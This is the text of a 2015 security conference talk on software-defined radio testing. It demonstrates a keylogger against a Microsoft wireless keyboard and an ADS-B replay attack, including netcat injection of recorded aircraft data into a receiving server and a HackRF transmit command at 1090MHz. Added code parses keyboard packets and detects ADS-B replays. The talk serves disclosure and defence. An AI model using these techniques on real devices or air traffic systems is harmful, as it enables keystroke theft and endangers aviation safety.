Keiichi Horiai, Fujitsu System Integration LABs.
CODE BLUE 2015
Wireless security testing with attack
Agenda
Circumstance
• In the IoT (Internet of Things) era, the key is wireless security.
• To analyze wireless security, SDR (Software Defined Radio) technology is effective.
Introduce GNU Radio, an SDR tool
• A powerful tool to test wireless security
• Easily available; works with inexpensive peripheral hardware
Wireless security testing with attack
• Attack #1: key logging a wireless keyboard
• Attack #2: the replay attack for ADS-B
Recent publications on wireless security
Abuse/falsification of software and firmware
• Drone attack by malware and network
• http://www.slideshare.net/codeblue_jp/cb14-dongcheol-hongja/
RF signal level interception/injection
• SPREAD SPECTRUM SATCOM HACKING: ATTACKING THE GLOBALSTAR SIMPLEX DATA SERVICE
• https://www.blackhat.com/docs/us-15/materials/us-15-Moore-Spread-Spectrum-Satcom-Hacking-Attacking-The-GlobalStar-Simplex-Data-Service.pdf
Low-cost GPS simulator: GPS spoofing by SDR
• Lin Huang, Qing Yang, DEFCON 23
• https://media.defcon.org/DEF%20CON%2023/DEF%20CON%2023%20presentations/Lin%20Huang%20&%20Qing%20Yang/DEFCON-23-Lin-Huang-Qing-Yang-GPS-Spoofing.pdf
About GNU Radio
In 2001, Eric Blossom in the US started a free and open-source software development toolkit for radio.
Multi-platform (Linux/FreeBSD/OSX/Windows)
Runs on a personal computer (cf. many software radio technologies run on an FPGA on dedicated hardware).
Create a flow graph using the GUI of GNU Radio Companion
flow graph -> XML file -> Python -> C++
License: GPL v3
http://gnuradio.org/redmine/projects/gnuradio/wiki
GNU Radio components
Elements of the flow graph: SOURCE -> BLOCK -> SINK
• SOURCE (input): software or hardware
• BLOCK (processing): software, written in Python or C++
• SINK (output): software or hardware
Sources
Software
• Waveform generation (sin, cos, triangle, sawtooth, square)
• Various noise
• File
Hardware
• PC audio
• Other peripheral hardware: RTL-SDR, HackRF, BladeRF, USRP
Blocks
• Operators (logical, bytes, integer, real, complex, ...)
• Constant, variable (slider), type conversion
• Calculation (add, sub, multiply, div, log, RMS, integral, ...)
• Filters (low-pass, high-pass, band-pass, band-reject, FFT, Hilbert, IIR, decimation, ...)
• Modulation and demodulation (AM, FM, FSK, PSK, QAM, OFDM, ...)
• Level control (AGC, mute, squelch, moving average, ...)
• Network (TCP, UDP, socket, ...) and more
Sinks
Software
• Scope, FFT, waterfall
• Histogram, constellation plot
• Other, files
Hardware
• PC audio
• Other peripheral hardware: HackRF, BladeRF, USRP, etc.
Peripheral hardware (e.g.)
                        RTL-SDR    HackRF     BladeRF    USRP
Frequency range [MHz]   24-1800    1-6000     300-3800   70-6000
A/D converter [bits]    8          8          12         12
Bandwidth [MHz]         2.8        20         28         56
Transmit / Receive      Rx         Tx | Rx    Tx & Rx    Tx & Rx
Price                   $20        $300       $420       $675
FlowGraph (e.g.)
Available tools
VHF receiver (e.g.): a VHF receiver composed of an RTL-SDR and GNU Radio
ISM 2.4GHz band
WiFi/Bluetooth frequency allocation
http://www.digikey.com/es/articles/techzone/2013/jun/shaping-the-wireless-future-with-low-energy-applications-and-systems
ISM 2.4GHz band monitoring (e.g.) with a HackRF
Attacking wireless devices
Survey the attack target
• Search the FCC ID on the FCC site
• Photos someone else has put on view?
• Overhaul (teardown) by myself
Necessary information: the RF chip data sheet
• Frequency band, modulation, transmission speed, data format
Observe and analyze the signal
FCC ID Search
https://apps.fcc.gov/oetcf/eas/reports/ViewExhibitReport.cfm?mode=Exhibits&RequestTimeout=500&calledFromFrame=N&application_id=Al%2FFPgcInlgHLjNZvXbPTQ%3D%3D&fcc_id=A6O60001058RX
How to monitor and analyze the signal
Receive the radio waves
• Check the signal: GNU Radio, SDR#
• Write the received signal to a file: GNU Radio, rtl_sdr
Analyze
• Monitor the waveform in detail: baudline
• Cut out the area you need (select the area and write it to a file): baudline
• Demodulation: GNU Radio | in-house scripts
• Decode / parse / decrypt: convert to bits (0/1) (a hex dump is unreadable); find the characteristic bit pattern
Signal monitoring tool: Baudline
Baudline is a signal time-frequency visualization and analysis support tool
Requirements
• Linux (x86_64, PowerPC)
• Mac OS X
• Solaris SPARC
Select the area and write it to a file
http://www.baudline.com/index.html
Monitoring the signal (e.g.)
Attack demo #1
Keylogger for the Microsoft Wireless Keyboard 800
At first, tried to reproduce "keysweeper" (*1); it did not work with the MS Wireless Keyboard 800 Japanese edition.
Demonstrate the process of investigating the cause with GNU Radio to make it work.
(*1) https://github.com/samyk/keysweeper
Keylogger for wireless keyboards
27MHz band: easy to snoop because (in)secure; end of sale in the 2000s
2.4GHz band: the same frequency as Bluetooth/WiFi. The Bluetooth specification is secure? What about keyboards with a proprietary specification?
Related projects
Travis Goodspeed, 2010: the GoodFET is an open-source JTAG adapter, loosely based upon the TI MSP430 FET UIF and EZ430U boards. http://goodfet.sourceforge.net/
KeyKeriki project (CanSecWest 2010): developed a device with an ARM Cortex MPU and a radio module which can do keyboard sniffing and remote command execution. http://www.remote-exploit.org/articles/keykeriki_v2_0__8211_2_4ghz/index.html
Keysweeper (January 2015): made the process efficient and systematic
• Focuses on the fixed part (0xCD) of the device address
• Embedded in a USB charger, logging to EEPROM
• Detects keywords and sends an SMS via a mobile module
• Forwards keystrokes to another device in real time ... etc.
https://github.com/samyk/keysweeper
Experiment on a breadboard
Sniffer hardware: Arduino Nano + nRF24L01 (2.4GHz ISM band, GFSK modulation, 1Mbps or 2Mbps), connected over USB to the control PC; target: Microsoft Wireless Keyboard 800
• Scan 2403-2480MHz in 1MHz steps
• Inspect 1 byte (=0xCD) in the device ID
• If the next 2 bytes are (0x0A38 | 0x0A78), stop scanning and start logging
About 1500 lines of Arduino program
Success?
Radio setup
End radio setup
scan
Tuning to 2480
Potential keyboard: AA AA 5A A9 CD 27 55 49
Tuning to 2403
Tuning to 2404
Potential keyboard: E4 AA AA A5 CD 55 A5 5A
Tuning to 2405
Tuning to 2406
Tuning to 2407
Tuning to 2408
…………………
No !!
Wireless keyboard wave form
Baudline (cut the area)
Demodulation
(Figure: I and Q waveforms, amplitude -50..50 over samples 1..301)
I/Q
Vfm = ( I (dQ/dt) - Q (dI/dt) ) / (I^2 + Q^2)
preamble
bit = Vfm > 0 ? 0 : 1
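As an added example (not code from the slides), the quadrature demodulation formula above carried through in Python: a constructed 2-FSK baseband I/Q signal is generated, Vfm = (I dQ/dt - Q dI/dt) / (I^2 + Q^2) is computed with one-sample differences, and the bits are sliced with the slide's rule. The oversampling factor, the deviation, the missing Gaussian pulse shaping and the known symbol timing are all assumptions of this example; a real GFSK capture would also need clock recovery from the 0xAA/0x55 preamble.

```python
import math

SAMPLES_PER_BIT = 8      # assumption: oversampling factor of the recording
DEVIATION = 0.1          # assumption: frequency deviation in cycles per sample


def fsk_modulate(bits, amplitude=1.0):
    """Constructed test signal: 2-FSK at baseband (the keyboard uses GFSK; the
    Gaussian pulse shaping is omitted here). Bit 0 is sent as +DEVIATION and
    bit 1 as -DEVIATION so that the slide's rule (Vfm > 0 -> 0) recovers them."""
    i_samples, q_samples = [], []
    phase = 0.0
    for bit in bits:
        step = 2 * math.pi * (DEVIATION if bit == 0 else -DEVIATION)
        for _ in range(SAMPLES_PER_BIT):
            phase += step
            i_samples.append(amplitude * math.cos(phase))
            q_samples.append(amplitude * math.sin(phase))
    return i_samples, q_samples


def quadrature_demod(i_samples, q_samples):
    """Vfm = (I dQ/dt - Q dI/dt) / (I^2 + Q^2) from slide 26, with the derivatives
    replaced by one-sample differences. Dividing by the instantaneous power makes
    the output independent of the received amplitude (it equals sin(delta phase))."""
    vfm = [0.0]                       # no previous sample for the first point
    for n in range(1, len(i_samples)):
        i, q = i_samples[n], q_samples[n]
        di = i - i_samples[n - 1]
        dq = q - q_samples[n - 1]
        power = i * i + q * q
        vfm.append((i * dq - q * di) / power if power > 0.0 else 0.0)
    return vfm


def slice_bits(vfm, samples_per_bit=SAMPLES_PER_BIT):
    """bit = Vfm > 0 ? 0 : 1, decided once per symbol by summing Vfm over the
    symbol period (more robust than a single sample when noise is present).
    Assumes the symbol boundaries are already known."""
    bits = []
    for start in range(0, len(vfm) - samples_per_bit + 1, samples_per_bit):
        bits.append(0 if sum(vfm[start:start + samples_per_bit]) > 0.0 else 1)
    return bits


def demodulate_to_string(i_samples, q_samples):
    """Whole chain: I/Q -> Vfm -> '0'/'1' string like the dump on slide 27."""
    return "".join(str(b) for b in slice_bits(quadrature_demod(i_samples, q_samples)))


if __name__ == "__main__":
    # 0xAA 0xA9, the first two bytes recovered on slide 31
    test_bits = [1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 1]
    i_s, q_s = fsk_modulate(test_bits, amplitude=0.02)   # weak signal
    print(demodulate_to_string(i_s, q_s))               # 1010101010101001
```

The amplitude argument shows why the normalisation matters: a signal 50 times weaker produces the same Vfm values and the same bits, so the slicer threshold of zero needs no gain adjustment.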
Get BIT sequence
bit = Vfm > 0 ? 0:1
111111111111001100010000000000100110111110111111111111111111111111111111111110010101010101010010011001111100101000101101100111001000000000001010011110000001110100000001010011100001110110100110001100111010100111101110000010001110010100110011100111001110011100011110111110100111000111111111111100110010000000000001111111011111111111111101111111101111111111111111111111111111111001010101010101001001100111110010100010110110011100100000000000101001111000000111010000000101001110000111011010011000110011101010011110111000001000111001010011001110101001110011100111000111101111101001110101111111111100110000001000100010001111111111111111111111111011111111111111111111101010101001011001111100101000101101100111001000000000001010011110000001110100000001010011100001110110100110001100111010100111101110000010001110……….
nRF24L01 packet format
Preamble: 1 byte (0xAA | 0x55)
Address: 3-5 bytes
PCF (packet control field): 9 bits
Payload: 0-32 bytes
CRC: 1-2 bytes
http://www.nordicsemi.com/eng/Products/2.4GHz-RF/nRF24L01
KeyKeriki project results
• The Microsoft Wireless Keyboard 800's device address is composed of 5 bytes starting from 0xCD
• Keystrokes are encrypted by a simple XOR operation using this device address
http://www.remote-exploit.org/content/keykeriki_v2_cansec_v1.1.pdf
Get the bit sequence (the dump on slide 27, bit = Vfm > 0 ? 0 : 1) and find "0x0A78 (0000101001111000)"
Packet control field: 9 bits
Device ID
Preamble 8 bits + address 5 bytes + packet control 9 bits + payload
Device ID detection
{ P.A. } { p[0] p[1] p[2] p[3] p[4] }
AA A9 33 E5 16 CE
10101010 10101001 00110011 11100101 00010110 11001110
{ PktCTL bits } 0A 78 1D 01
010000000 00001010 01111000 00011101 00000001
{ payload ....... } 0100111000011101101001100011001110101001111011100……
// From keysweeper_mcu_src https://github.com/samyk/keysweeper
if (radio.available()) {
  radio.read(&p, PKT_SIZE);
  if (p[4] == 0xCD) // 0xCD -> 0xCE for Japanese KBD
  {
    sp("Potential keyboard: ");
    // ... (rest of the handler not shown on the slide)
  }
}
DEVICE ID
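As an added example (not keysweeper's code and not code from the slides), a Python parser that applies the method of slides 30 and 31 to the bit dump of slide 27: it searches the raw bit string for the 0x0A78 / 0x0A38 marker that keysweeper looks for (slide 22) and then reads the preamble, 5-byte address, 9-bit packet control field, payload and CRC around it, using the field widths of the nRF24L01 format on slide 28. The bit string is transcribed from the first packet on slide 27; the marker table and the 5-byte address width are assumptions taken from the deck. The payload is left as received; no XOR decryption is done.

```python
# Bit dump of the first packet on slide 27 (the idle '1's before and after it
# are part of the capture). Broken into fixed-width lines for readability only;
# the line breaks are not field boundaries.
SLIDE27_BITS = (
    "111111111111111111111111111111111100101010101010100100110011111"
    "001010001011011001110010000000000010100111100000011101000000010"
    "100111000011101101001100011001110101001111011100000100011100101"
    "001100111001110011100111000111101111101001110001111111111111100"
)

# First two payload bytes that keysweeper looks for (slide 22), as bit patterns.
MARKERS = {"0A78": "0000101001111000", "0A38": "0000101000111000"}

PREAMBLE_LEN, ADDRESS_LEN, PCF_LEN, CRC_LEN = 8, 40, 9, 16   # widths in bits


def bits_to_hex(bitstr):
    """'10101010' -> 'aa'; the input length must be a multiple of 8."""
    return bytes(int(bitstr[i:i + 8], 2) for i in range(0, len(bitstr), 8)).hex()


def find_packets(bits, markers=MARKERS):
    """Locate nRF24L01 Enhanced ShockBurst packets in a raw bit string by the
    payload marker and read the fields backwards and forwards from it:
    preamble (8 bits) | address (5 bytes) | PCF (9 bits) | payload | CRC-16.
    Candidates whose preamble is not 0xAA/0x55 or whose length field exceeds
    32 bytes are discarded, which filters most false marker hits in noise."""
    packets = []
    for name, pattern in markers.items():
        pos = bits.find(pattern)
        while pos >= 0:
            pcf_at = pos - PCF_LEN
            addr_at = pcf_at - ADDRESS_LEN
            pre_at = addr_at - PREAMBLE_LEN
            if pre_at >= 0 and bits[pre_at:addr_at] in ("10101010", "01010101"):
                pcf = bits[pcf_at:pos]
                length = int(pcf[:6], 2)             # payload length in bytes
                payload_end = pos + 8 * length
                crc_end = payload_end + CRC_LEN
                if length <= 32 and crc_end <= len(bits):
                    packets.append({
                        "marker": name,
                        "preamble": bits_to_hex(bits[pre_at:addr_at]),
                        "address": bits_to_hex(bits[addr_at:pcf_at]),
                        "payload_len": length,
                        "pid": int(pcf[6:8], 2),     # 2-bit packet id
                        "no_ack": int(pcf[8]),       # NO_ACK flag
                        "payload": bits_to_hex(bits[pos:payload_end]),
                        "crc": bits_to_hex(bits[payload_end:crc_end]),
                    })
            pos = bits.find(pattern, pos + 1)
    return packets


def looks_like_ms_keyboard(packet):
    """The check from keysweeper's MCU code quoted on slide 31: the last address
    byte is 0xCD for the US keyboard and 0xCE for the Japanese edition."""
    return packet["address"][-2:] in ("cd", "ce")


if __name__ == "__main__":
    for pkt in find_packets(SLIDE27_BITS):
        print(pkt, "-> MS keyboard" if looks_like_ms_keyboard(pkt) else "-> other")
```

Run against the slide 27 dump this yields a single packet with preamble AA, address A9 33 E5 16 CE, a 16-byte payload beginning 0A 78 1D 01 and a 16-bit CRC, which is the same framing the slide draws by hand; the address check is the one-byte change (0xCD to 0xCE) that slide 31 identifies.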
Behavior after the change (0xCD -> 0xCE)
{………………}
Tuning to 2479
Tuning to 2480
Potential keyboard: A9 33 E5 16 CE 43 5 3C
KEYBOARD FOUND! Locking in on channel 802setupRadio
16: 0A 78 1D 01 56 03 43 00 00 1E 00 00 00 00 00 8F <- Key 1 Press> 1
8: 0A 38 1D 01 56 03 00 84
16: 0A 78 1D 01 57 03 43 00 00 00 00 00 00 00 00 90 <- Key OFF
16: 0A 78 1D 01 58 03 43 00 00 1F 00 00 00 00 00 80 <- Key 2 Press> 2
8: 0A 38 1D 01 58 03 00 8A
{………………}
(*1) USB HID usage table: http://www.freebsddiary.org/APC/usb_hid_usages.php
Key Logger DEMO
Summary #1
Using GNU Radio, found that the device address KEY of the Microsoft Wireless Keyboard 800 Japanese edition is 0xCE
Change the device address KEY to 0xCE, then the keylogger monitors the keyboard's behavior.
Don't use a wireless keyboard for operations with sensitive information. In particular, be wary of devices with a proprietary specification.
Caution: for experiments in Japan, the transmit signal from the nRF24L should be disabled
• boolean shoutKeystrokes = true; -> false;
Attack demo #2: replay attack for ADS-B (*1) mounted on aircraft
Aviation is part of the critical infrastructure
ADS-B is the next-generation air traffic control system
Attack demos were played at Black Hat 2012, DEFCON 20, etc.
Applying SDR technology, tried to replay the attack
(*1) Automatic Dependent Surveillance–Broadcast
Congestion in the Skies
http://www.flightradar24.com/
ADS-B overview
Because old radar's positional accuracy was 1-2 NM, the service interval (separation) had to be widened to ensure the safety of aircraft operation.
To keep up with the increasing number of aircraft, a new system is needed. ADS-B, which uses GPS to provide highly accurate position information, was developed as the next-generation air traffic control system in the 1980s-1990s.
Now about 70% of passenger planes have ADS-B
(Source http://www.flightradar24.com/how-it-works)
Equipment required by 2017 in Europe and by 2020 in the United States
Points at issue
• No encryption
• Broadcast with no authentication
• Simple encoding and simple modulation scheme
Mechanism of ADS-B
ADS-B: Automatic Dependent Surveillance–Broadcast. Using a broadcast datalink, an aircraft transmits its own location, speed, altitude, and so on, obtained from measuring systems such as GPS.
Image http://www.enri.go.jp/news/osirase/pdf/e_navi10.pdf
(Figure labels: GPS location, broadcast datalink, ground receiving station, control center)
Papers related to ADS-B
About vulnerability
• Donald L. McCallie, Major, USAF (2011): http://apps.fcc.gov/ecfs/document/view.action?id=7021694523
• Andrei Costin, Aurelien Francillon, Black Hat 2012: https://media.blackhat.com/bh-us-12/Briefings/Costin/BH_US_12_Costin_Ghosts_In_Air_Slides.pdf
• Brad "RenderMan", DEFCON 20 (2012): http://korben.info/wp-content/uploads/defcon/SpeakerPresentations/Renderman/DEFCON-20-RenderMan-Hackers-plus-Airplanes.pdf
• Hugo Teso, CyCon 2013: https://ccdcoe.org/cycon-2013.html
About countermeasures
• Martin Strohmeier, Ivan Martinovic (2014): Detecting False-Data Injection Attacks on Air Traffic Control Protocols, http://www.cs.ox.ac.uk/files/6604/wisec2014-abstract.pdf
• Kyle D. Wesson, Brian L. Evans, et al. (2014): Can Cryptography Secure Next Generation Air Traffic Surveillance?, https://radionavlab.ae.utexas.edu/images/stories/files/papers/adsb_for_submission.pdf
• Seoung-Hyeon Lee, Yong-Kyun Kim, Deok-Gyu Lee, et al. (2014): Protection Method for Data Communication between ADS-B Sensor and Next-Generation Air Traffic Control Systems, http://www.mdpi.com/2078-2489/5/4/622
Expected threats
Snoop (Eavesdropping)
Jamming
Fake aircraft’s wake injection(Fake track injection)
How to receive ADS-B?
Receive the radio waves
• USB stick for receiving overseas digital TV, about 1000 JPY to 2000 JPY
Process the signal and display
• PC (Windows, Mac, Linux)
• Smartphone, tablet
ADS-B receiver software
Decoder
• ADSB# http://airspy.com/index.php/downloads/
• RTL1090 http://rtl1090.web99.de/
• Modesdeco2 (w/ display function) http://radarspotting.com/forum/index.php/topic,2978.msg13471.html
• dump1090 (w/ display function) https://github.com/antirez/dump1090
Display
• Virtual Radar Server http://www.virtualradarserver.co.uk/
• adsbSCOPE http://www.sprut.de/electronic/pic/projekte/adsb/adsb_en.html#downloads
• PlanePlotter http://www.coaa.co.uk/planeplotter.htm
Receivable area
Antenna
ADS-B format
Format
Actual received I/Q signals
https://media.defcon.org/DEF%20CON%2020/DEF%20CON%2020%20slides/DEF%20CON%2020%20Hacking%20Conference%20Presentation%20By%20RenderMan%20-%20Hacker%20and%20Airplanes%20No%20Good%20Can%20Come%20Of%20This%20-%20Slides.m4v
Waveform monitoring with GNU Radio: the I/Q samples and their magnitude (I^2 + Q^2)
Received ADS-B (e.g.)
*8d7583a5585b575a9ebc4bbb3f04;
CRC: 000000 (ok)
DF 17: ADS-B message.
  Capability : 5 (Level 2+3+4)
  ICAO Address : 7583a5
  Extended Squitter Type: 11
  Extended Squitter Sub : 0
  Extended Squitter Name: Airborne Position
  …….
  F flag : odd
  T flag : non-UTC
  Altitude : 17125 feet
  ………….
Processing chain: I/Q signal after A/D conversion -> demodulation / decode -> raw data in hex -> parse the data -> aircraft location data, etc.
Attack vectors
(Figure: GPS satellite -> ADS-B broadcast from the aircraft -> ADS-B receiving stations -> IP network; the actor's injection points are marked V1, V2 and V3)
Image http://www.mlit.go.jp/koku/koku_fr14_000007.html
Replay attack (V1)
Intercepted raw data (file name: xxxx.raw)
Inject the raw data via the IP network
$ cat xxxx.raw | nc target_IP target_PORT
※ In reality, the adversary needs to find a way to get through the authentication in order to connect to the target server.
*8d869210581fe3bf4350dfd62439;*5da40455385715;*8d86dca29914ee0f20f410ef2595;*8d780c3c581db79c18a4b0ffc872;*8d867f609914b993e8700ba91251;*02a1839b9e229d;*……………
Replay attack (V2)
Create an ADS-B pulse signal file from the raw data
$ cat xxxx.raw | ./adsb-pulsegen test_file.bin
Use the file to generate a modulated RF signal
$ hackrf_transfer -f 1090MHz -s 2MHz -t test_file.bin -x 0
*8d869210581fe3bf4350dfd62439;*5da40455385715;*8d86dca29914ee0f20f410ef2595;*8d780c3c581db79c18a4b0ffc872;*8d867f609914b993e8700ba91251;*02a1839b9e229d;*0261819c1d1e5a;……………
DEMO
Injection via IP network (V1)
• Real-time interception of the ADS-B signal and display on a map
• Inject raw data received in the past
Injection via RF channel (V2)
• Generate an I/Q signal file from the received raw data
• Inject the RF signal modulated by the I/Q signal
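As an added example (not dump1090's code and not code from the slides), a Python decoder for the "*...;" lines shown on slides 46 and 48 together with a simple replay check for the V1 scenario on slides 48 to 50. It verifies the Mode S CRC-24, decodes the DF17 fields printed on slide 46 (capability, ICAO address, type code, altitude, T and F flags), and flags an airborne-position frame that reappears bit-for-bit after more than a few seconds, which is what pushing a recorded raw file back into a receiving station looks like from the receiving side. The frames are copied from the slides; the feed timestamps and the 5-second window are constructed for this example. Note what the CRC does and does not give a defender: it catches transmission errors, but a replayed frame is bit-perfect and passes it, which is exactly the "no authentication" point the deck raises.

```python
import re

MODES_POLY = 0xFFF409   # Mode S CRC-24 generator, low 24 bits of the 25-bit polynomial


def modes_crc(frame: bytes) -> int:
    """Remainder of the whole frame divided by the Mode S generator polynomial.
    DF17 carries plain parity in its last 24 bits, so a clean frame gives 0."""
    crc = 0
    for byte in frame:
        for i in range(7, -1, -1):
            top = (crc >> 23) & 1
            crc = ((crc << 1) | ((byte >> i) & 1)) & 0xFFFFFF
            if top:
                crc ^= MODES_POLY
    return crc


def parse_avr_line(line: str) -> dict:
    """Decode one '*<hex>;' line (the format on slides 46 and 48). Only the
    fields printed on slide 46 are decoded; CPR position decoding is omitted."""
    m = re.fullmatch(r"\*([0-9a-fA-F]+);", line.strip())
    if not m or len(m.group(1)) not in (14, 28):
        raise ValueError("not a Mode S frame: %r" % line)
    frame = bytes.fromhex(m.group(1))
    df = frame[0] >> 3
    info = {"df": df, "ca": frame[0] & 0x7, "icao": frame[1:4].hex(),
            "bits": 8 * len(frame)}
    if df != 17:
        return info                              # not an extended squitter
    info["crc_ok"] = modes_crc(frame) == 0
    me = frame[4:11]                             # 56-bit ME field
    info["tc"] = me[0] >> 3                      # type code, ME bits 1-5
    if 9 <= info["tc"] <= 18:                    # airborne position, barometric altitude
        alt12 = ((me[1] << 4) | (me[2] >> 4)) & 0xFFF   # ME bits 9-20
        if (alt12 >> 4) & 1:                     # Q bit set: 25 ft steps
            n = ((alt12 >> 5) << 4) | (alt12 & 0xF)     # 11 bits left after dropping Q
            info["altitude_ft"] = n * 25 - 1000
        info["t_flag"] = (me[2] >> 3) & 1        # ME bit 21: 1 = UTC synchronised
        info["f_flag"] = (me[2] >> 2) & 1        # ME bit 22: 0 = even, 1 = odd CPR frame
    return info


def find_replayed_positions(feed, window_s=5.0):
    """Heuristic replay check over a feed of (seconds, avr_line) pairs. A live
    airborne-position squitter repeats every half second but with changing CPR
    and altitude fields; the same 112 bits seen again after more than window_s
    is characteristic of a recorded file being injected (slide 48)."""
    last_seen = {}
    alerts = []
    for t, line in feed:
        try:
            info = parse_avr_line(line)
        except ValueError:
            continue
        if info["df"] != 17 or not 9 <= info.get("tc", 0) <= 18:
            continue
        key = line.strip().lower()
        prev = last_seen.get(key)
        last_seen[key] = t
        if prev is not None and t - prev > window_s:
            alerts.append({"icao": info["icao"], "age_s": t - prev, "t": t})
    return alerts


# Frames copied from slides 46 and 48; the timestamps are constructed for this
# example (a real feed would carry the receiver's own clock).
SAMPLE_FEED = [
    (0.0, "*8d7583a5585b575a9ebc4bbb3f04;"),
    (0.5, "*8d869210581fe3bf4350dfd62439;"),
    (1.0, "*5da40455385715;"),
    (1.5, "*8d86dca29914ee0f20f410ef2595;"),
    (2.0, "*8d780c3c581db79c18a4b0ffc872;"),
    (61.5, "*8d869210581fe3bf4350dfd62439;"),   # slide 48 frame pushed in again
]

if __name__ == "__main__":
    print(parse_avr_line(SAMPLE_FEED[0][1]))
    print(find_replayed_positions(SAMPLE_FEED))
```

On the slide 46 frame the decoder reproduces dump1090's output (DF 17, capability 5, ICAO 7583a5, type 11, odd CPR frame, non-UTC, 17125 feet, CRC ok); flipping any bit makes the CRC check fail. The replay heuristic is deliberately narrow: identification and velocity squitters can legitimately repeat identical bits, so only position frames are tracked, and a sophisticated injector that rewrites the position fields would need the tracking-algorithm checks cited on slide 39 instead.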
ADS-B network injection
http://www.flightradar24.com/
Network injection demo screenshot
ADS-B RF injection: RF injection demo screenshot
Security of air traffic control? Why doesn't it get renewed?
• Threats not being recognized
• To preserve safety and interoperability
• International discussion takes a long period of time: forming consensus, development, deployment
Image http://www.jatcaonline.com/SSR_system.JPG https://upload.wikimedia.org/wikipedia/commons/f/fe/D-VOR_PEK.JPG
(Figure labels: ASR/SSR, ILS (glide slope / localizer), VOR/DME)
Summary #2
Technically, an attack against ADS-B is extremely easy
Not only ADS-B but any air traffic control system that relies on radio waves is vulnerable to jamming attacks.
Possible attack scenarios: terrorists or nation-state actors inject false flight paths or perform jamming attacks to confuse air traffic control as one of the ways to accomplish an objective.
Is it hard to implement early countermeasures? (Requires an international consensus)
A mitigation plan such as detecting interception or using tracking algorithms must be considered
Create an environment that enhances virtual training and incident response plans
Conclusion
Due to the emergence of the software-defined radio experimentation tool GNU Radio and low-cost RF hardware, the technical threshold for carrying out an RF attack has been lowered
Existing systems that rely on radio waves, such as the air traffic control system, have not been able to follow the modernization that commercial technology like WiFi or smartphones has gone through
A fundamental countermeasure will require a long period of time
Compensating for the lack of countermeasures with operational practice will require enhanced incident response plans and training
Thank you !
Questions ?
Copyright 2010 FUJITSU LIMITED